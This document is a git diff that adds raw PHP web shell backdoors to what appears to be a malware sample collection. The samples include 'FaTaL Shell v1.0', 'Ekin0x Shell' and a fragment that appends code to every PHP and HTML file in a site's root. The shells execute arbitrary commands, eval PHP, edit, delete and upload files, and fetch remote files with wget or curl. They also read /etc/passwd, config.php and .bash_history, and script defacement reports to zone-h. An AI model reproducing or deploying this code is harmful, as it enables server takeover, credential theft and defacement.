"; +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} +function view_size($size) +{ +if (!is_numeric($size)) {return FALSE;} +else +{ +if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} +elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} +elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} +else {$size = $size . " B";} +return $size; +}} +if(!isset($_SERVER['DOCUMENT_ROOT'])) +{ +$n = $_SERVER['SCRIPT_NAME']; +$f = ereg_replace('\\\\', '/',$_SERVER["PATH_TRANSLATED"]); +$f = str_replace('//','/',$f); +$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f); +} +$codigo = "\n"; +$directorio = $_SERVER['DOCUMENT_ROOT']; + +foreach (glob("$directorio/*.php") as $archivo) { +$fp=fopen($archivo,"a+"); +fputs($fp,$codigo); +} +foreach (glob("$directorio/*.htm") as $archivh) { +$fp=fopen($archivh,"a+"); +fputs($fp,$codigo); +} +foreach (glob("$directorio/*.html") as $archivl) { +$fp=fopen($archivl,"a+"); +fputs($fp,$codigo); +} +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.ca b/PHP/Backdoor.PHP.Agent.ca new file mode 100644 index 00000000..a3e54452 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ca @@ -0,0 +1,301 @@ + +$v){$_POST[$k] = stripslashes($v);}} +@ini_set('max_execution_time',0); +(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)"); + +(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0); +(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0); +$version='version 1.0 by FaTaLErrOr'; +$action=$_POST['action']; +$file=$_POST['file']; +$dir=$_POST['dir']; +$content=''; +$stdata=''; +$style=''; +$header=''.getenv("HTTP_HOST").' - FaTaL Shell v1.0'.$style.''; +$footer=''; + +$lang=array( +'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.', +'uploadok'=>'Baþarýyla Yüklendi.', +'dircrt'=>'Klasör Oluþturuldu.', +'dontlist'=>'Listelenemiyor Ýzin Yok.', +'dircrterr'=>'Oluþturulamýyor Ýzin Yok.', +'dirnf'=>'Dizin Bulunamadi.', +'filenf'=>'.', +'dontwrdir'=>'Sadece Okunabilir.', +'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.', +'deletefileok'=>'Dosya Silindi.', +'deletedirok'=>'Klasör Silindi.', +'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi', +'cantrfile'=>'Dosya Açýlamýyor izin Yok.', +'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..', +'workdir'=>'Çalýþma Dizini: ', +'fullacc'=>'Full Yetki.', +'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.', +'thisnodir'=>'Klasör Seçin.', +'allfuncsh'=>'Fonksiyoýnlar Kapalý.' +); + +$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions + +function test_file($file){ +if(!file_exists($file))$err="1"; +elseif(!is_file($file)) $err="2"; +elseif(!is_readable($file))$err="3"; +elseif(!is_writable($file))$err="4"; else $err="5"; +return $err;} + +function test_dir($dir){ +if(!file_exists($dir))$err="1"; +elseif(!is_dir($dir)) $err="2"; +elseif(!is_readable($dir))$err="3"; +elseif(!is_writable($dir))$err="4"; else $err="5"; +return $err;} + +function perms($file){ + $perms = fileperms($file); + if (($perms & 0xC000) == 0xC000) {$info = 's';} + elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} + elseif (($perms & 0x8000) == 0x8000) {$info = '-';} + elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} + elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} + elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} + elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} + else {$info = 'u';} + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); + return $info;} + +function view_size($size){ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size;} + +if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer"; + +if(isset($dir)){ + $ts['test']=test_dir($dir); + switch($ts['test']){ + case 1:$stdata.=$lang['dirnf'];break; + case 2:$stdata.=$lang['thisnodir'];break; + case 3:$stdata.=$lang['dontlist'];break; + case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break; + case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;} +}else $dir=@chdir($dir); + +$dir=getcwd()."/"; +$dir=str_replace("\\","/",$dir); + +if(isset($file)){ + $ts['test1']=test_file($file); + switch ($ts['test1']){ + case 1:$stdata.=$lang['filenf'];break; + case 2:$stdata.=$lang['isdontfile'];break; + case 3:$stdata.=$lang['cantrfile'];break; + case 4:$stdata.=$lang['onlyracc'];$file=$file;break; + case 5:$stdata.=$lang['fullacc'];$file=$file;break;} +} + +function shell($cmd) +{ + global $lang; + $ret = ''; + if (!empty($cmd)) + { + if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);} + elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);} + elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();} + elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();} + elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);} + else $ret=$lang['allfuncsh']; + } + return $ret; +} + +function createdir($dir){mkdir($dir);} + +//delete file +if($action=="delete"){ +if(unlink($file)) $content.=$lang['deletefileok']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +} +//delete dir +if($action=="deletedir"){ +if(!rmdir($file)) $content.=$lang['empty']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +else $content.=$lang['deletedirok']." AnaSayfaya Dönemk Ýçin Týklayýnýz."; +} +//shell +if($action=="shell"){ +$content.="
+ +
+
+
";} +//editor +if($action=="editor"){ + $stdata.="
+ + + Dosyanýn Adý (Full Url Yazýn)
"; + function writef($file,$data){ + $fp = fopen($file,"w+"); + fwrite($fp,$data); + fclose($fp); +} + function readf($file){ + clearstatcache(); + $f=fopen($file, "r"); + $contents = fread($f,filesize($file)); + fclose($f); + return htmlspecialchars($contents); +} +if(@$_POST['save'])writef($file,$_POST['data']); +if(@$_POST['create'])writef($file,""); +$test=test_file($file); +if($test==1){ +$content.="
+ +File name:
+ +
"; +} +if($test>2){ +$content.="
+ + +
+
"; +}} +//viewer +if($action=="viewer"){ +$content.=""; +$content.=""; + if (is_dir($dir)) { + if (@$dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir . $file)=="dir") $dire[]=$file; + if(filetype($dir . $file)=="file")$files[]=$file; + } + closedir($dh); + @sort($dire); + @sort($files); + if ($GLOBALS['os']==1) { + $content.=""; + } + $content.=""; + for($i=0;$i'.$dire[$i].''; + } + for($i=0;$i'.$files[$i].'
'; + } + $content.="
Klasore Git:
HDD Secin:"; + for ($j=ord('C'); $j<=ord('Z'); $j++) + if (@$dh = opendir(chr($j).":/")) + $content.=' '.chr($j).''; + $content.="
Sistem: ".@php_uname()."
BiçimBoyutizinSeçenekler
Klasor'.perms($link).'X
Dosya'.view_size(filesize($linkfile)).''.perms($linkfile).'DEX
"; +}}} +//downloader +if($action=="download"){ +header('Content-Length:'.filesize($file).''); +header('Content-Type: application/octet-stream'); +header('Content-Disposition: attachment; filename="'.$file.'"'); +readfile($file);} +//phpeval +if($action=="phpeval"){ +$content.="
+ + + <?php
+
+ ?>
+
"; +if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);} +//upload +if($action=="upload"){ + if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir; + $form_win="
+ + Buraya Uploadla:Dosyayý Adlandýr (Gerekli) :"; + if($os==1)$content.=$form_win; + if($os==0){ + $content.=$form_win; + $content.='File addres: +
'; +} + +if(isset($_POST['uploadloc'])){ +if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else +$uploadfile = $dirupload."/".$_POST['filename']; + +if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);} +if(file_exists($uploadfile))$content.=$lang['filext']; +elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) +$content.=$lang['uploadok']; +} + +if(isset($_POST['upload'])){ + if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename'])) + switch($_POST['with']) + { + case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break; + case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break; + case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; + case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; + case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break; + case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break; +}}} +//end function +?> + + +

FaTaLSheLL v1.0

+
| Shell | Ana Sayfa| Dosya Editle| Dosya Upload| Php Eval | <-Geri | Ýleri->|

+

 

+ +
Safe mode:
+ Fonksiyon Kýsýtlamasý:
+ Sistem:
+ Durum:
COPYRIGHT BY StarHack.oRg
+ + + + + + + + + + + diff --git a/PHP/Backdoor.PHP.Agent.cb b/PHP/Backdoor.PHP.Agent.cb new file mode 100644 index 00000000..bb6f9cd2 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.cb @@ -0,0 +1,614 @@ + ";print"
$delmtxt
";} + function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); + $nscmd=htmlspecialchars($scmd);print $nscmd;} + elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); + $ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} + elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); + while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; + print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ + ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ + ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); + print htmlspecialchars($pret);}} + function input($type,$name,$value,$size) + {if (empty($value)){print "";} + elseif(empty($name)&&empty($size)){print "";} + elseif(empty($size)){print "";} + else {print "";}} + function permcol($path){if (is_writable($path)){print ""; + callperms($path); print "";} + elseif (!is_readable($path)&&!is_writable($path)){print ""; + callperms($path); print "";} + else {print "";callperms($path);}} + if ($dlink=="dwld"){download($_REQUEST['dwld']);} + function download($dwfile) {$size = filesize($dwfile); + @header("Content-Type: application/force-download;name=$dwfile"); + @header("Content-Transfer-Encoding: binary"); + @header("Content-Length: $size"); + @header("Content-Disposition: attachment; filename=$dwfile"); + @header("Expires: 0"); + @header("Cache-Control: no-cache, must-revalidate"); + @header("Pragma: no-cache"); + @readfile($dwfile); exit;} + ?> + + + Ekin0x Shell + + + + + + + + ";$ef=""; + $st=""; + $et="
";$c1=""; + $c2="";$ec=""; + $sta=""; + $sfnt="";$efnt=""; + ################# Ending of common variables ######################## + + print"";print"";print"
"; print"
## Ekin0x Shell ## +
"; print"
";print "
"; + print"";print"";print"
"; print"
";print "Home"; + print " - Geri"; + print " - phpinfo"; + if ($dlink=='phpinfo'){print phpinfo();die();} + print " - Base64 decode"; + print " - Url decode"; + print " - Url encode"; + print " - Md5"; + print " - Izinleri Kontrol Et"; + print " - File source"; + print " - Quick index"; + print " - Zone-h"; + print " - Mail"; + print " - Cmd help"; + if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase'])); + print "

Result is : $sfnt".$cbase."$efnt"; die();} + if ($dlink=="basepw"){ print "

[ Base64 - Decoder ]"; + print $sf;input ("text","ncbase",$ncbase,35);print " "; + input ("submit","","Decode","");print $ef; die();} + if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld'])); + print "

Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){ + print "

[ Url - Decoder ]"; print $sf; + input ("text","nurld",$nurld,35);print " "; + input ("submit","","Decode","");print $ef; die();} + if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "

Result is : $sfnt".$urlenc."$efnt"; die();} + if ($dlink=='urlen'){print "

[ Url - Encoder ]"; + print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();} + if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf'])); + print "

Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){ + print "

[ MD5 - Encoder ]"; + print $sf;input ("text","nmdf",$nmdf,35);print " "; + input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef; + print "

";print "
";print "
";die();} + function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){ + print "

[ Sorry, U choosed an empty file or the file not exists ]";die();} + elseif(isset($showsc)&&filesize($showsc) !=="0") { + print "

"; + if (!show_source($showsc)||!function_exists('show_source')){print "
[ Sorry can't complete the operation ]
";die();}print "
";die();}}if ($dlink=='showsrc'){ + print "

: Choose a php file to view in a color mode, any extension else will appears as usual :";print "

"; + input ("text","showsc","",35);print " "; + input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));} + if ($dlink=='cmdhlp'){ + print "

: Insert the command below to get help or to know more about it's uses :";print ""; + input ("text","hlp","",35);print " "; + input ("submit","","Help","");print $ef; die();} + if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp']; + print "

[ The command is $sfnt".$hlp."$efnt ]"; + $hlp = escapeshellcmd($hlp);print "

"; + if (!function_exists(shell_exec)&&!function_exists(exec)&& + !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) + {print "
[ Sorry can't complete the operation ]
";}else {print "
";
+ if(!callfuncs("man $hlp | col -b")){print "
[ Finished !! ]";}print "
";}print "
";die();} + if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt'])) + {if (touch ($_REQUEST['indx'])==true){ + $fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt'])); + fclose($fp);print "

[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]

";print "
[ Yeniden Editle + ] -- [ Curr-Dir ]
";die(); }else {print "

[ Sorry, Can't create the index !! ]

";die();}} + if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){ + print $sf."
";print "

"; + input ("text","indx","Index-name",35);print " "; + input ("submit","qindsub","Create","");print $ef;die();} + if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){ + $mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt']; + if (mail($mailto,$subj,$mailtxt)){print "

[ Mail sended to $sfnt".$mailto." $efnt successfully ]

"; die();}else {print "

[ Error, Can't send the mail ]

";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "

[ Error, Can't send the mail ]

";die();} + if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){ + print $sf."
";print "

";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " "; + input ("submit","mailsub","Send-mail","");print $ef;die();} + if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);} + function callzone($nscdir){ + if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";} + else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";} + fwrite ($fpz,"\$arq = @ARGV[0]; + \$grupo = @ARGV[1]; + chomp \$grupo; + open(a,\"<\$arq\"); + @site = ; + close(a); + \$b = scalar(@site); + for(\$a=0;\$a<=\$b;\$a++) + {chomp \$site[\$a]; + if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; } + print \"[+] Sending \$site[\$a]\n\"; + use IO::Socket::INET; + \$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next; + print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\"; + print \$sock \"Accept: */*\r\n\"; + print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\"; + print \$sock \"Accept-Language: pt-br\r\n\"; + print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\"; + print \$sock \"Connection: Keep-Alive\r\n\"; + print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\"; + print \$sock \"Host: old.zone-h.org\r\n\"; + print \$sock \"Content-Length: 385\r\n\"; + print \$sock \"Pragma: no-cache\r\n\"; + print \$sock \"\r\n\"; + print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\"; + close(\$sock);}"); + if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']); + }else{print "

[ Can't complete the operation, try change the current dir with writable one ]
";}$zonet=$_REQUEST['zonet']; + if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) + {print "[ Can't complete the operation !! ]";} + else {callfuncs("chmod 777 $zpl;chmod 777 $li"); + ob_start();callfuncs("perl $zpl $li $zonet");ob_clean(); + print "

[ All sites should be sended to zone-h.org successfully !! ]";die();} + }if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){ + print $sf."
";print "

";input ("text","zonet","Hacker-name",35);print " "; + input ("submit","zonesub","Send","");print $ef;die();} + print "
"; print"
";print "
"; + function inisaf($iniv) { $chkini=ini_get($iniv); + if(($chkini || strtolower($chkini)) !=='on'){print"Kapali ( Guvenlik Yok )";} else{ + print"Acik ( Guvenli )";}}function inifunc($inif){$chkin=ini_get($inif); + if ($chkin==""){print " None";} + else {$nchkin=wordwrap($chkin,40,"\n", 1);print "".$nchkin."";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);} + elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r'); + while (!feof($opop)){ $nval= fgetc($opop);}} + elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){ + ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();} + if($nval=$owhich){print"ON";} + else{print"OFF";} } + print""; + print"
"; print"

"; + print"Safe-mode :\t";print inisaf('safe_mode');print "";print"
"; + if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print ""; print""; print""; print""; print""; print""; print""; print "
"; + print "
"; print"
Mysql : "; + callocmd('which mysql','/usr/bin/mysql'); + print"
"; print"
Perl : "; + callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"		"; print"
Gcc : "; + callocmd('which gcc','/usr/bin/gcc'); print"		"; + print"
Curl : "; callocmd('which curl','/usr/bin/curl'); print"		"; print"
GET : "; + callocmd('which GET','/usr/bin/GET'); + print"		";print"
Wget : "; + callocmd('which wget','/usr/bin/wget'); + print"		"; print"
Lynx : "; + callocmd('which lynx','/usr/bin/lynx'); + print"
"; }print "

"; + print "IP Numaran : ".$REMOTE_ADDR."
"; + print "Server IP : ".$SERVER_ADDR.""; + print"
".$SERVER_SIGNATURE.""; + print "Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."
"; + print "Engelli Fonksiyonlar : ";inifunc(disable_functions);print"
"; + print "Kimsin : "; callfuncs('id');print"
Os : "; + if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else { + if (!function_exists(shell_exec)&&!function_exists(exec)&& + !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)) + {print php_uname(); print "/";print PHP_OS;} + else {callfuncs('uname -a');}}print"
"; + print"Php-versiyon : ".phpversion(); print"
Current-path : "; + print $nscdir."     [ ";permcol($nscdir);print " ]"; + print"
";print "Shell'in Burda : " .__file__; + print"
Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / "; + print"Bos Alan: "; readable_size(disk_free_space($nscdir)); + print "
"; print"

"; + if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']); + if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; } + else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir'])) + { $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}} + else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){ + $ncfile=trim($_REQUEST['cfile']); + if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);} + else{ $mess3= "Dosya Olustur/Sil";}} + elseif(isset($_REQUEST['delfile'])){ + $ndfile=trim($_REQUEST['cfile']); + if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";} + else {$mess3= "Dosya Olustur/Sil";}} + else {$mess3="Dosya Olustur/Sil";} + class upload{ function upload($file,$tmp){ + $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";} + if (@copy($tmp,$nscdir."/".$file)){ + print "
: $file uploaded successfully :
"; }else{print "
: Error uploading $file :
";} } } } + $obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){ + $ustname=trim ($_REQUEST['ustname']);ob_start(); + if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);} + if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');} + if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');} + if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');} + if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);} + if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);} + if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);} + if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);} + if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();} + if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&& + !isset($_REQUEST['rfiletxt'])){ + if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){ + $files[] = $filename; sort($files);}print "
"; + print"
"; + print ""; + print ""; + print ""; + print ""; + print ""; + print ""; + print ""; + print "";if(strstr(PHP_OS,"Linux")){ + print "";} + print ""; foreach ($files as $nfiles){ + if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");} + if (is_writable("$nscdir/$nfiles")){ + $scmess2= "
Evet";}else {$scmess2="
Hayir";}if (is_readable("$nscdir/$nfiles")){ + $scmess3= "
Evet";}else {$scmess3= "
Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "
Klasör";}else{$scmess4= "
Dosya";} + print"
"; print ""; print ""; + print""; + print ""; + print ""; print "";print ""; if(strstr(PHP_OS,"Linux")){ + print "";} + print ""; print ""; + }print "
"; + print "
Dosyalar";print "
";print "
Boyut";print "
";print "
Yazma";print "
";print "
Okuma";print "
";print "
Tür";print "
";print "
Düzenleme";print "
";print "
Adlandirma";print "
";print "
Indir";print "
";print "
Group";print "
";print "
Izinler";print "
"; + if (is_dir($nfiles)){print "[ $nfiles ]
";}else {print "$nfiles
";} + print"		"; + print "
"; + if (is_dir("$nscdir/$nfiles")){print "Klasör";} + elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";} + print "
"; + print "
$scmess2"; print "
"; + print "
$scmess3"; print "
"; + print "
$scmess4"; print"
";if(is_file("$nscdir/$nfiles")){ + print "
Düzenle";}else {print "
Düzenle
";}print"
";print "
Adlandir";print"
"; + if(is_file("$nscdir/$nfiles")){ + print "
indir";}else {print "
indir
";}print"
"; + print "
";owgr($nfiles); + print "
";print"		";print "
"; + permcol("$nscdir/$nfiles");print "
";print"
";print "
";}else {print "

[ Can't open the Dir, permission denied !! ]

";}} + elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){ + if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "

[ Executed command ][$] : ".$_REQUEST['cmd']."
";} + print "
".$sta;
+ if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
+ elseif(isset($_REQUEST['eval'])){
+ ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
+ $ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
+ elseif (isset($_REQUEST['subqcmnds'])){
+ if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
+ if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
+ if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
+ if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
+ if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
+ if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
+ if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
+ if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
+ if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
+ if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
+ if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
+ if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
+ if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
+ }print $eta."
";} + function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']); + if(is_readable($rfile)&&is_file($rfile)){ + $fp=fopen ($rfile,"r");print"
"; + print "
[ Editing ".basename($rfile)." ] [ Geri ] [ Curr-Dir ]

"; + print $sf."";if (is_writable($rfile)){ + print "
".$ef;}else + {print "
[ Can't edit ".basename($rfile)." ]

";}print "

";} + elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "
[ You selected a wrong file name or you don't have access !! ]

";}} + function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']); + if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+"); + $rfiletxt=stripslashes($_REQUEST['rfiletxt']); + fwrite ($rffp,$rfiletxt);print "
+ [ ".basename($hidrfile)." Saved !! ] + [ Curr-Dir ] [ Edit again ] +

";fclose($rffp);} + else {print "
[ Can't save the file !! ] [ Curr-Dir ] [ Back ]

